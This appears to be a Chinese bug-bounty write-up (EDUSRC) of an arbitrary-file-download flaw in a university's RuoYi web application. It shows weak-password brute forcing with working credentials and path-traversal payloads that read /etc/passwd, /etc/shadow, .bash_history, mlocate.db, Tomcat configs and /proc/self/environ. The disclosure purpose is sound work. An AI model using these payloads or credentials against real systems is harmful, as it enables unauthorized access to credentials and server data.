edusrc--某985任意文件下载

00demons00 2023-02-26 20:28:24

 

文章来自于公众号:WK安全

欢迎大家多多支持

免责声明

由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

打开url:http://xxxxxxx/login

目测是一个RuoYi框架,根据以往的历史漏洞曝光,有以下这些:

1、shiro默认key导致反序列化命令执行

2、后台sql注入(需要管理员权限)

3、后台任意文件下载(普通用户即可)

4、后台定时任务存在反序列化漏洞利用点导致rce(管理员权限)

5、admin admin123(弱口令)

262bbf5071e443599bf80d83949e3ec6.png

先跑shiro默认key,经过测试并不存在该漏洞

2ccfec0f8d974e1c95f503e577936c15.png

 Burp抓包,发现验证码可以重复使用、不会失效,开始爆破弱口令,跑用户名,密码指定为123456

爆破成功,有没有弱口令,均为普通用户权限

13111111111 123456

111111 123456

d8ce4ec708494bfc9638e30ca3bcf469.png

 

复现历史漏洞-后台任意文件下载

漏洞不存在!

7f12479f27774d6e83d5c678551ff932.png

 

既然历史漏洞都没有,那就看一下唯一的一个功能点- 【考核表提交】

随意点击一个考核表,burp抓取流量包

84a4280324dc41eda302dc846a6bad0f.png

fileName参数值拿去url解码

 3d6fb741da804835bc238927c139de32.png

 

fileName参数如果可控的话,这里可能存在一个任意文件下载漏洞

测试下载一下/etc/passwd文件

Payload:../../../../../../../../../../../../../../../../../../etc/passwd

39e7c69b52544ecca35fe692ec5179ff.png

 

漏洞存在!

 

读取用户历史命令

Payload:../../../../../../../../../../../../../../../../../../root/.bash_history4e7dfe284d864521b7edb7b84b125c8c.png

发现webapps目录下存在源码压缩包和备份文件,但是其中源码压缩包已被删除

下载mlocate.db文件寻找shiro的key,此文件记录了全文件路径,基于本地所有文件的信息的配置信息都知道。需要高权限用户才可以。

Payload:../../../../../../../../../../../../../../../../../../var/lib/mlocate/mlocate.db

Word文档打开该文件,搜索shiro-core

得到路径为:/usr/local/apache-tomcat-8.5.55/webapps/ROOT/WEB-INF/lib/shiro-core-1.7.0.jar987f32de31e24205913875e7169b74c7.png

 3ccd12f65c3b45fe8a3cd93defbbb9e9.png

下载shiro-core-1.7.0.jar文件

Payload:../../../../../../../../../../../../../../../../../../usr/local/apache-tomcat-8.5.55/webapps/ROOT/WEB-INF/lib/shiro-core-1.7.0.jar

 

利用Luyten工具反编译java文件

根据百度搜索shiro key密钥的位置得知,在shiro-core/org/apache/shiro/mgt/AbstractRememberMeManager.java文件中0888f3fc74cc4c33814b7263c7dc19e7.png

文章链接:https://blog.thekingofduck.com/post/TheWayToChangeShiroKey/

 

可实际中却没有key,但是这一行代码很可疑5b326819c58c495986566edf4a1e6942.png

跟踪AesCipherService函数,发现key的加密方式为AES. GCM14a5a47cc8994440a87c66939dbc5f4f.png

再次使用工具尝试AES GCM加密方式爆破密钥b7bb465046c747b5a0cb0d8adebf5b72.png

 

没有密钥

 

下载tomcat配置文件server.xml和context.xml

Payload:../../../../../../../../../../../../../../../../../../ usr/local/apache-tomcat-8.5.55/conf/server.xml

Payload:../../../../../../../../../../../../../../../../../../usr/local/apache-tomcat-8.5.55/conf/tomcat-users.xml

 

查看server.xml文件,不存在tomcat幽灵猫漏洞181bbb3d50e2455ea960546ac57e3f1c.png

查看tomcat-users.xml,什么都没有5166945609804810b054e5f24667ae94.png

读取/etc/shadow,如果是弱口令是可以解密的

Payload:../../../../../../../../../../../../../../../../../../etc/shadow20e63631f5864d5884584adccdec6d70.png

看着好复杂,应该解不出来的

偶然!

13838eb2c1b04a60b076394eeee78393.png

读取内网ip

Payload:../../../../../../../../../../../../../../../../../../proc/self/environ

内网ip为:10.21.40.27

ac24a4e00e0d45c0b661a5afe65e781f.png

止步于此。

 

# 安全 # web安全
Logo
欢迎使用若依开源

快速构建 Web 应用程序

更多推荐

深入 Composer autoload

这几天看到 phphub 上面有人开始进坑怒看 laravel 源代码,于是我也凑个热闹来看下这个故事。众所周知 composer 是现代PHP 项目的基石, 与古老的 pear 不同, composer 并不是一款专注于系统级别php 管理的包管理系统,而是基于项目的一个库管理系统。这就好比 npminstall -g 和 npminstall 的区别。而且最主要

avatar RuoYi 若依

实体类(VO,DO,DTO)的划分

经常会接触到VO,DO,DTO的概念,本文从领域建模中的实体划分和项目中的实际应用情况两个角度,对这几个概念进行简析。得出的主要结论是:在项目应用中,VO对应于页面上需要显示的数据(表单),DO对应于数据库中存储的数据(数据表),DTO对应于除二者之外需要进行传递的数据。一、实体类百度百科中对于实体类的定义如下:实体类的主要职责是存储和管理系统内部的信息,它也可以有行为,甚至很复杂的行为,但这些行

avatar RuoYi 若依

计算机课如何断开学生端,极域课堂管理系统怎么连接老师 学生端连接问题解决方法...

现在的大学课堂都紧跟着时代的步伐,选择用电子教室代替传统的教室,电子教室的好处就是可以让坐在角落的同学也能清楚的看到老师的每一个操作,除此之外还可以电子举手,提交作业获得老师的及时反馈,学习效率倍增。如果你发现自己的电脑出现连接不上电脑的情况的,来看看小编是怎么解决的把!类别:教育管理 大小:16.38M 语言:简体中文评分:61、首先,正常的学生机器是开机就会自动的连接老师端的,如果...

avatar RuoYi 若依